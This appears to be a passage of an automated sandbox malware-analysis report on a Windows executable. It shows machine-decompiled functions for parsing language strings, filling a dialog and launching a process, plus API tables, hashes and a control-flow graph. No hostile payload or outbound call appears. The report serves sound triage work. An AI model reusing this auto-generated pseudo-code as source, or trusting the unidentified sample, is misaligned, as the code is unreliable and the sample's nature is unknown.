												if(_t443 != _t468[0xf]) {
													_t468[0x15] = _t268;
													goto L107;
												}
												L72:
												_t268 = _t268 + 1;
												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
												__eflags = _t443 - _t468[0xa];
												if(_t443 == _t468[0xa]) {
													goto L72;
												}
												goto L71;
											}
										}
										_t453 = _t468[0x15];
										_t324 = _t268 | 0xffffffff;
										__eflags = _t324;
										_t466 = _t372;
										_t468[0xd] = _t324;
										_t374 = _t468[0x13];
										 *_t468 = L"STRINGS";
										_t468[1] = L"DIALOG";
										_t468[2] = L"MENU";
										_t468[3] = L"DIRECTION";
										do {
											_t468[0x10] = E00CE3E13(_t468[_t466]);
											_t326 = E00CE6088( &(_t374[2]) + _t453 * 2, _t468[_t466], _t325);
											_t473 = _t473 + 0x10;
											__eflags = _t326;
											if(_t326 != 0) {
												L47:
												_t424 = _t468[0xd];
												goto L48;
											}
											_t346 =  &(_t468[0x10][_t453]);
											_t430 = 0x20;
											__eflags = _t374[2 + _t346 * 2] - _t430;
											if(_t374[2 + _t346 * 2] > _t430) {
												goto L47;
											}
											_t424 = _t466;
											_t453 = _t346 + 1;
											_t468[0xd] = _t424;
											L48:
											_t466 = _t466 + 1;
											__eflags = _t466 - 4;
										} while (_t466 < 4);
										_t462 = _t468[0xc];
										_t372 = 0;
										_t468[0x15] = _t453;
										_t450 = _t468[0x11];
										__eflags = _t424;
										if(__eflags != 0) {
											_t268 = _t468[0x15];
											_t399 = _t468[0x13];
											if(__eflags <= 0) {
												goto L65;
											} else {
												goto L53;
											}
											while(1) {
												L53:
												_t443 = _t399 + _t268 * 2;
												_t455 =  *_t443 & 0x0000ffff;
												__eflags = _t455 - _t468[0xa];
												if(_t455 == _t468[0xa]) {
													goto L55;
												}
												L54:
												__eflags = _t455 - _t468[0xf];
												if(_t455 != _t468[0xf]) {
													_t468[0x15] = _t268;
													_t425 = _t372;
													_t456 = 0x20;
													__eflags = ( *_t443 & 0x0000ffff) - _t456;
													_t468[0x10] = _t372;
													_t450 = _t468[0x11];
													if(( *_t443 & 0x0000ffff) <= _t456) {
														L60:
														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = 0;
														E00CD1DA7(_t468 - 0x1d0, _t468 - 0xa4, 0x64);
														_t468[0x15] =  &(_t468[0x15][_t468[0x10]]);
														_t333 = _t468[0xd];
														__eflags = _t333 - 3;
														if(_t333 != 3) {
															__eflags = _t333 - 1;
															_t334 = "$%s:";
															if(_t333 != 1) {
																_t334 = "@%s:";
															}
															E00CCE5B1(_t468 - 0x108, 0x64, _t334, _t468 - 0xa4);
															_t473 = _t473 + 0x10;
														} else {
															_t338 = E00CE3E49(_t468 - 0x1d0, _t468 - 0x1d0, L"RTL");
															asm("sbb al, al");
															_t468[0xe][0x64] =  ~_t338 + 1;
														}
														L51:
														_t268 = _t468[0x15];
														goto L107;
													} else {
														goto L57;
													}
													while(1) {
														L57:
														__eflags = _t425 - 0x63;
														if(_t425 >= 0x63) {
															break;
														}
														_t341 =  *_t443;
														_t443 = _t443 + 2;
														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = _t341;
														_t425 = _t425 + 1;
														_t342 = 0x20;
														__eflags =  *_t443 - _t342;
														if( *_t443 > _t342) {
															continue;
														}
														break;
													}
													_t468[0x10] = _t425;
													goto L60;
												}
												L55:
												_t268 = _t268 + 1;
												L53:
												_t443 = _t399 + _t268 * 2;
												_t455 =  *_t443 & 0x0000ffff;
												__eflags = _t455 - _t468[0xa];
												if(_t455 == _t468[0xa]) {
													goto L55;
												}
												goto L54;
											}
										}
										E00CD05A7(_t468 - 0x108, 0xcf39d0, 0x64);
										goto L51;
									}
									__eflags = _t444 - _t468[5];
									if(_t444 != _t468[5]) {
										goto L75;
									}
									goto L42;
									L107:
									__eflags = _t268 - _t468[0x12];
								} while (_t268 < _t468[0x12]);
								_t392 = _t468[0xb];
								goto L109;
							} else {
								L00CE3E2E(_t461);
								goto L125;
							}
						}
						_t389 = _t385 >> 1;
						_t468[0x12] = _t389;
						goto L33;
					} else {
						goto L5;
					}
					goto L7;
					L5:
					E00CCE261(_t459, _t443, _t447);
					E00CCE261(_t459 + 0x14, _t443, _t447);
					_t447 = _t447 + 1;
					_t478 = _t447 -  *0xcfe720; // 0x64
					if(_t478 < 0) {
						goto L5;
					} else {
						_t372 = 0;
						goto L7;
					}
				}
			}
















































































                                                    0x00ccda67
                                                    0x00ccda68
                                                    0x00ccda70
                                                    0x00ccda7a
                                                    0x00ccda84
                                                    0x00ccda85
                                                    0x00ccda86
                                                    0x00ccda89
                                                    0x00ccda8b
                                                    0x00ccda8e
                                                    0x00ccda91
                                                    0x00ccda97
                                                    0x00ccda99
                                                    0x00ccda9c
                                                    0x00ccdaa2
                                                    0x00ccdade
                                                    0x00ccdaa4
                                                    0x00ccdaac
                                                    0x00ccdac4
                                                    0x00ccdace
                                                    0x00ccdace
                                                    0x00ccdae9
                                                    0x00ccdaee
                                                    0x00ccdaf6
                                                    0x00ccdaf9
                                                    0x00ccdb07
                                                    0x00cce242
                                                    0x00cce248
                                                    0x00cce252
                                                    0x00cce25a
                                                    0x00cce25e
                                                    0x00ccdb0d
                                                    0x00ccdb0d
                                                    0x00ccdb0f
                                                    0x00ccdb15
                                                    0x00ccdb33
                                                    0x00ccdb3f
                                                    0x00ccdb51
                                                    0x00ccdb56
                                                    0x00ccdb59
                                                    0x00ccdb5c
                                                    0x00ccdb5f
                                                    0x00ccdb62
                                                    0x00ccdb71
                                                    0x00ccdb76
                                                    0x00ccdb8b
                                                    0x00ccdb90
                                                    0x00ccdb93
                                                    0x00ccdb95
                                                    0x00ccdb95
                                                    0x00ccdb98
                                                    0x00ccdb9d
                                                    0x00ccdc5a
                                                    0x00ccdc5a
                                                    0x00ccdc5d
                                                    0x00ccdc6e
                                                    0x00ccdc76
                                                    0x00ccdc77
                                                    0x00ccdc7a
                                                    0x00ccdc7f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdc85
                                                    0x00ccdc88
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdbb7
                                                    0x00ccdbc7
                                                    0x00ccdbcc
                                                    0x00ccdbd1
                                                    0x00ccdc52
                                                    0x00ccdc52
                                                    0x00ccdc55
                                                    0x00000000
                                                    0x00ccdbd3
                                                    0x00ccdbd3
                                                    0x00ccdbd3
                                                    0x00ccdbd6
                                                    0x00ccdbd8
                                                    0x00ccdbe1
                                                    0x00ccdc0c
                                                    0x00ccdc14
                                                    0x00ccdc40
                                                    0x00ccdc40
                                                    0x00ccdc44
                                                    0x00000000
                                                    0x00ccdc46
                                                    0x00ccdc46
                                                    0x00ccdba3
                                                    0x00ccdbab
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdbab
                                                    0x00ccdc20
                                                    0x00ccdc30
                                                    0x00ccdc35
                                                    0x00ccdc3a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdc3a
                                                    0x00ccdc14
                                                    0x00ccdbe9
                                                    0x00ccdbef
                                                    0x00ccdc00
                                                    0x00ccdc05
                                                    0x00ccdc0a
                                                    0x00ccdc4e
                                                    0x00000000
                                                    0x00ccdc4e
                                                    0x00ccdc0a
                                                    0x00000000
                                                    0x00ccdbef
                                                    0x00ccdc97
                                                    0x00ccdc9a
                                                    0x00ccdc9f
                                                    0x00ccdca9
                                                    0x00ccdcab
                                                    0x00ccdcaf
                                                    0x00ccdcb1
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdcc3
                                                    0x00ccdcc8
                                                    0x00ccdccc
                                                    0x00ccdcce
                                                    0x00ccdcd1
                                                    0x00ccdce1
                                                    0x00ccdce7
                                                    0x00ccdcea
                                                    0x00ccdcec
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdcf8
                                                    0x00ccdcfe
                                                    0x00ccdd04
                                                    0x00ccdd0a
                                                    0x00ccdd0d
                                                    0x00ccdd0f
                                                    0x00ccdd12
                                                    0x00ccdd12
                                                    0x00ccdd17
                                                    0x00ccdd19
                                                    0x00ccdd1b
                                                    0x00ccdd1b
                                                    0x00ccdd21
                                                    0x00ccdd31
                                                    0x00ccdd36
                                                    0x00ccdd40
                                                    0x00ccdd42
                                                    0x00ccdd46
                                                    0x00ccdd48
                                                    0x00ccdd56
                                                    0x00ccdd5a
                                                    0x00ccdd5c
                                                    0x00ccdd5e
                                                    0x00ccdd61
                                                    0x00ccdd63
                                                    0x00ccdd66
                                                    0x00ccdd69
                                                    0x00ccdd6c
                                                    0x00ccdd73
                                                    0x00ccdd7a
                                                    0x00cce15c
                                                    0x00cce15c
                                                    0x00cce160
                                                    0x00cce1e0
                                                    0x00cce1e3
                                                    0x00cce1e6
                                                    0x00cce1ee
                                                    0x00cce1f3
                                                    0x00cce1f8
                                                    0x00cce1fb
                                                    0x00cce214
                                                    0x00cce221
                                                    0x00cce228
                                                    0x00cce23a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce1fd
                                                    0x00cce1fd
                                                    0x00cce200
                                                    0x00cce209
                                                    0x00cce20e
                                                    0x00cce20f
                                                    0x00cce20f
                                                    0x00000000
                                                    0x00cce1fd
                                                    0x00cce165
                                                    0x00cce16e
                                                    0x00cce171
                                                    0x00cce172
                                                    0x00cce174
                                                    0x00cce1af
                                                    0x00cce1b1
                                                    0x00cce1b7
                                                    0x00cce1b8
                                                    0x00cce1bb
                                                    0x00cce1bd
                                                    0x00cce1bd
                                                    0x00cce1ca
                                                    0x00cce1d0
                                                    0x00cce1d1
                                                    0x00cce1d2
                                                    0x00cce1d3
                                                    0x00cce1d9
                                                    0x00000000
                                                    0x00cce1d9
                                                    0x00cce176
                                                    0x00cce17b
                                                    0x00cce17e
                                                    0x00cce17f
                                                    0x00cce17f
                                                    0x00cce182
                                                    0x00cce185
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce187
                                                    0x00cce18b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce18d
                                                    0x00cce18d
                                                    0x00cce18f
                                                    0x00cce192
                                                    0x00cce195
                                                    0x00cce195
                                                    0x00cce195
                                                    0x00cce19a
                                                    0x00cce19c
                                                    0x00cce1a0
                                                    0x00cce1a1
                                                    0x00cce1a6
                                                    0x00cce1a8
                                                    0x00cce1aa
                                                    0x00cce1aa
                                                    0x00cce1a6
                                                    0x00000000
                                                    0x00cce19c
                                                    0x00ccdd80
                                                    0x00ccdd87
                                                    0x00ccdd8e
                                                    0x00ccdd8e
                                                    0x00ccdd91
                                                    0x00ccdd93
                                                    0x00cce02a
                                                    0x00cce02a
                                                    0x00cce02e
                                                    0x00cce02f
                                                    0x00cce032
                                                    0x00cce035
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce03b
                                                    0x00cce03f
                                                    0x00cce092
                                                    0x00cce093
                                                    0x00cce096
                                                    0x00cce0b6
                                                    0x00cce0b6
                                                    0x00cce0ba
                                                    0x00cce145
                                                    0x00cce145
                                                    0x00cce148
                                                    0x00cce14a
                                                    0x00cce14d
                                                    0x00cce14d
                                                    0x00000000
                                                    0x00cce14d
                                                    0x00cce0c3
                                                    0x00cce0cf
                                                    0x00cce0d2
                                                    0x00cce0d3
                                                    0x00cce0d5
                                                    0x00cce110
                                                    0x00cce112
                                                    0x00cce118
                                                    0x00cce119
                                                    0x00cce11c
                                                    0x00cce11e
                                                    0x00cce11e
                                                    0x00cce131
                                                    0x00cce137
                                                    0x00cce138
                                                    0x00cce139
                                                    0x00cce13a
                                                    0x00cce13f
                                                    0x00cce142
                                                    0x00000000
                                                    0x00cce142
                                                    0x00cce0d7
                                                    0x00cce0dc
                                                    0x00cce0df
                                                    0x00cce0e0
                                                    0x00cce0e0
                                                    0x00cce0e3
                                                    0x00cce0e6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce0e8
                                                    0x00cce0ec
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce0ee
                                                    0x00cce0ee
                                                    0x00cce0f0
                                                    0x00cce0f3
                                                    0x00cce0f6
                                                    0x00cce0f6
                                                    0x00cce0f6
                                                    0x00cce0fb
                                                    0x00cce0fd
                                                    0x00cce101
                                                    0x00cce102
                                                    0x00cce107
                                                    0x00cce109
                                                    0x00cce10b
                                                    0x00cce10b
                                                    0x00cce107
                                                    0x00000000
                                                    0x00cce0fd
                                                    0x00cce09a
                                                    0x00cce09b
                                                    0x00cce09e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce0a0
                                                    0x00cce0a6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce0ac
                                                    0x00cce0ac
                                                    0x00cce0b0
                                                    0x00000000
                                                    0x00cce0b0
                                                    0x00cce041
                                                    0x00cce047
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce051
                                                    0x00cce051
                                                    0x00cce054
                                                    0x00cce07b
                                                    0x00cce07d
                                                    0x00cce07d
                                                    0x00cce07e
                                                    0x00cce085
                                                    0x00cce086
                                                    0x00cce089
                                                    0x00000000
                                                    0x00cce089
                                                    0x00cce056
                                                    0x00cce056
                                                    0x00cce059
                                                    0x00cce077
                                                    0x00000000
                                                    0x00cce077
                                                    0x00cce05b
                                                    0x00cce05b
                                                    0x00cce05e
                                                    0x00cce073
                                                    0x00000000
                                                    0x00cce073
                                                    0x00cce060
                                                    0x00cce060
                                                    0x00cce063
                                                    0x00cce06f
                                                    0x00000000
                                                    0x00cce06f
                                                    0x00cce066
                                                    0x00cce069
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce06b
                                                    0x00000000
                                                    0x00cce06b
                                                    0x00ccdd99
                                                    0x00ccdd9e
                                                    0x00ccdda2
                                                    0x00ccddae
                                                    0x00ccddb0
                                                    0x00ccddb1
                                                    0x00ccddb5
                                                    0x00ccdf29
                                                    0x00ccdf2c
                                                    0x00ccdf33
                                                    0x00ccdf38
                                                    0x00ccdf3a
                                                    0x00cce024
                                                    0x00cce024
                                                    0x00cce027
                                                    0x00000000
                                                    0x00cce027
                                                    0x00ccdf4c
                                                    0x00ccdf5d
                                                    0x00ccdf62
                                                    0x00ccdf67
                                                    0x00ccdf69
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdf71
                                                    0x00ccdf84
                                                    0x00ccdf99
                                                    0x00ccdfae
                                                    0x00ccdfc0
                                                    0x00ccdfdb
                                                    0x00ccdfe0
                                                    0x00ccdfe3
                                                    0x00ccdfe5
                                                    0x00ccdfe7
                                                    0x00ccdfe7
                                                    0x00ccdfea
                                                    0x00ccdff0
                                                    0x00ccdff0
                                                    0x00cce004
                                                    0x00cce004
                                                    0x00cce006
                                                    0x00cce009
                                                    0x00cce009
                                                    0x00cce00d
                                                    0x00cce011
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce013
                                                    0x00cce013
                                                    0x00cce017
                                                    0x00cce01c
                                                    0x00000000
                                                    0x00cce01c
                                                    0x00cce019
                                                    0x00cce019
                                                    0x00cce009
                                                    0x00cce00d
                                                    0x00cce011
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce011
                                                    0x00cce009
                                                    0x00ccddbb
                                                    0x00ccddbe
                                                    0x00ccddbe
                                                    0x00ccddc1
                                                    0x00ccddc3
                                                    0x00ccddc6
                                                    0x00ccddc9
                                                    0x00ccddd0
                                                    0x00ccddd7
                                                    0x00ccddde
                                                    0x00ccdde5
                                                    0x00ccddf6
                                                    0x00ccddfd
                                                    0x00ccde02
                                                    0x00ccde05
                                                    0x00ccde07
                                                    0x00ccde22
                                                    0x00ccde22
                                                    0x00000000
                                                    0x00ccde22
                                                    0x00ccde0c
                                                    0x00ccde10
                                                    0x00ccde11
                                                    0x00ccde16
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde18
                                                    0x00ccde1a
                                                    0x00ccde1d
                                                    0x00ccde25
                                                    0x00ccde25
                                                    0x00ccde26
                                                    0x00ccde26
                                                    0x00ccde2b
                                                    0x00ccde2e
                                                    0x00ccde30
                                                    0x00ccde33
                                                    0x00ccde36
                                                    0x00ccde38
                                                    0x00ccde55
                                                    0x00ccde58
                                                    0x00ccde5b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde61
                                                    0x00ccde61
                                                    0x00ccde61
                                                    0x00ccde64
                                                    0x00ccde67
                                                    0x00ccde6b
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde6d
                                                    0x00ccde6d
                                                    0x00ccde71
                                                    0x00ccde78
                                                    0x00ccde7b
                                                    0x00ccde80
                                                    0x00ccde81
                                                    0x00ccde84
                                                    0x00ccde87
                                                    0x00ccde8a
                                                    0x00ccdeab
                                                    0x00ccdead
                                                    0x00ccdec5
                                                    0x00ccdecd
                                                    0x00ccded0
                                                    0x00ccded3
                                                    0x00ccded6
                                                    0x00ccdefc
                                                    0x00ccdeff
                                                    0x00ccdf04
                                                    0x00ccdf06
                                                    0x00ccdf06
                                                    0x00ccdf1c
                                                    0x00ccdf21
                                                    0x00ccded8
                                                    0x00ccdee4
                                                    0x00ccdef0
                                                    0x00ccdef4
                                                    0x00ccdef4
                                                    0x00ccde4d
                                                    0x00ccde4d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde8c
                                                    0x00ccde8c
                                                    0x00ccde8c
                                                    0x00ccde8f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde91
                                                    0x00ccde94
                                                    0x00ccde97
                                                    0x00ccde9f
                                                    0x00ccdea2
                                                    0x00ccdea3
                                                    0x00ccdea6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdea6
                                                    0x00ccdea8
                                                    0x00000000
                                                    0x00ccdea8
                                                    0x00ccde73
                                                    0x00ccde73
                                                    0x00ccde61
                                                    0x00ccde61
                                                    0x00ccde64
                                                    0x00ccde67
                                                    0x00ccde6b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccde6b
                                                    0x00ccde61
                                                    0x00ccde48
                                                    0x00000000
                                                    0x00ccde48
                                                    0x00ccdda4
                                                    0x00ccdda8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce150
                                                    0x00cce150
                                                    0x00cce150
                                                    0x00cce159
                                                    0x00000000
                                                    0x00ccdd4a
                                                    0x00ccdd4b
                                                    0x00000000
                                                    0x00ccdd50
                                                    0x00ccdd48
                                                    0x00ccdcd3
                                                    0x00ccdcd5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccdb17
                                                    0x00ccdb1a
                                                    0x00ccdb23
                                                    0x00ccdb28
                                                    0x00ccdb29
                                                    0x00ccdb2f
                                                    0x00000000
                                                    0x00ccdb31
                                                    0x00ccdb31
                                                    0x00000000
                                                    0x00ccdb31
                                                    0x00ccdb2f

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CCDA70
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CCDAAC
                                                      • Part of subcall function 00CCC29A: _wcslen.LIBCMT ref: 00CCC2A2
                                                      • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                      • Part of subcall function 00CD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CCBAE9,00000000,?,?,?,00010398), ref: 00CD1BA0
                                                    • _wcslen.LIBCMT ref: 00CCDDE9
                                                    • __fprintf_l.LIBCMT ref: 00CCDF1C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                    • API String ID: 566448164-801612888
                                                    • Opcode ID: fdd5a394b4ccda8de3dff6b10ec9f314a2c988560873033f0bf97b2f485ecd2c
                                                    • Instruction ID: 8bef2f5362f6f36bed33b5595a108d5226be16f9609852e2329ae2571c6bf6c3
                                                    • Opcode Fuzzy Hash: fdd5a394b4ccda8de3dff6b10ec9f314a2c988560873033f0bf97b2f485ecd2c
                                                    • Instruction Fuzzy Hash: 9132D071900258ABCF24EF68C845FEE77A5EF15300F44016EFA1697281EBB1EE85DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    C-Code - Quality: 100%
                                                    			E00CDD4D4() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E00CDB568(); // executed
				_t46 = GetDlgItem( *0xd08458, 0x68);
				_t49 =  *0xd08463; // 0x1
				if(_t49 == 0) {
					_t44 =  *0xd08440; // 0x0
					E00CD9285(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0xcf35f4);
					 *0xd08463 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}








                                                    0x00cdd4db
                                                    0x00cdd4f5
                                                    0x00cdd4fa
                                                    0x00cdd500
                                                    0x00cdd502
                                                    0x00cdd508
                                                    0x00cdd510
                                                    0x00cdd51b
                                                    0x00cdd529
                                                    0x00cdd52f
                                                    0x00cdd52f
                                                    0x00cdd53f
                                                    0x00cdd549
                                                    0x00cdd559
                                                    0x00cdd561
                                                    0x00cdd565
                                                    0x00cdd56a
                                                    0x00cdd570
                                                    0x00cdd57b
                                                    0x00cdd585
                                                    0x00cdd58d
                                                    0x00cdd58d
                                                    0x00cdd59d
                                                    0x00cdd5ab
                                                    0x00cdd5ba
                                                    0x00cdd5c2
                                                    0x00cdd5d0
                                                    0x00cdd5e1
                                                    0x00cdd5e1
                                                    0x00cdd5fd

                                                    APIs
                                                      • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                      • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                      • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010398,?), ref: 00CDB59E
                                                      • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                      • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                    • GetDlgItem.USER32(00000068,00D1FCB8), ref: 00CDD4E8
                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00CDAF07,00000001,?,?,00CDB7B9,00CF506C,00D1FCB8,00D1FCB8,00001000,00000000,00000000), ref: 00CDD510
                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDD51B
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDD529
                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD53F
                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CDD559
                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD59D
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CDD5AB
                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD5BA
                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD5E1
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00CF43F4), ref: 00CDD5F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                    • String ID: \
                                                    • API String ID: 3569833718-2967466578
                                                    • Opcode ID: 474138349c535ba0ef10354567869485e0ea1c230e9304622176235ae12815d6
                                                    • Instruction ID: b104c5dd5367a065df885a9e2dbee3cc7c74aa920c3ff34c4f8f515408fc272f
                                                    • Opcode Fuzzy Hash: 474138349c535ba0ef10354567869485e0ea1c230e9304622176235ae12815d6
                                                    • Instruction Fuzzy Hash: 7331E271145342BFE311DF20EC4AFAB7FACEB96704F000519F691D63A0EB688A058B76
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 837 cdd78f-cdd7a7 call cdec50 840 cdd7ad-cdd7b9 call ce3e13 837->840 841 cdd9e8-cdd9f0 837->841 840->841 844 cdd7bf-cdd7e7 call cdfff0 840->844 847 cdd7e9 844->847 848 cdd7f1-cdd7ff 844->848 847->848 849 cdd801-cdd804 848->849 850 cdd812-cdd818 848->850 852 cdd808-cdd80e 849->852 851 cdd85b-cdd85e 850->851 851->852 853 cdd860-cdd866 851->853 854 cdd837-cdd844 852->854 855 cdd810 852->855 858 cdd86d-cdd86f 853->858 859 cdd868-cdd86b 853->859 856 cdd84a-cdd84e 854->856 857 cdd9c0-cdd9c2 854->857 860 cdd822-cdd82c 855->860 863 cdd854-cdd859 856->863 864 cdd9c6 856->864 857->864 865 cdd882-cdd898 call ccb92d 858->865 866 cdd871-cdd878 858->866 859->858 859->865 861 cdd82e 860->861 862 cdd81a-cdd820 860->862 861->854 862->860 867 cdd830-cdd833 862->867 863->851 870 cdd9cf 864->870 872 cdd89a-cdd8a7 call cd1fbb 865->872 873 cdd8b1-cdd8bc call cca231 865->873 866->865 868 cdd87a 866->868 867->854 868->865 874 cdd9d6-cdd9d8 870->874 872->873 882 cdd8a9 872->882 883 cdd8be-cdd8d5 call ccb6c4 873->883 884 cdd8d9-cdd8e6 ShellExecuteExW 873->884 877 cdd9da-cdd9dc 874->877 878 cdd9e7 874->878 877->878 881 cdd9de-cdd9e1 ShowWindow 877->881 878->841 881->878 882->873 883->884 884->878 886 cdd8ec-cdd8f9 884->886 888 cdd90c-cdd90e 886->888 889 cdd8fb-cdd902 886->889 891 cdd925-cdd944 call cddc3b 888->891 892 cdd910-cdd919 888->892 889->888 890 cdd904-cdd90a 889->890 890->888 893 cdd97b-cdd987 CloseHandle 890->893 891->893 906 cdd946-cdd94e 891->906 892->891 898 cdd91b-cdd923 ShowWindow 892->898 896 cdd989-cdd996 call cd1fbb 893->896 897 cdd998-cdd9a6 893->897 896->870 896->897 897->874 899 cdd9a8-cdd9aa 897->899 898->891 899->874 903 cdd9ac-cdd9b2 899->903 903->874 905 cdd9b4-cdd9be 903->905 905->874 906->893 907 cdd950-cdd961 GetExitCodeProcess 906->907 907->893 908 cdd963-cdd96d 907->908 909 cdd96f 908->909 910 cdd974 908->910 909->910 910->893
                                                    C-Code - Quality: 81%
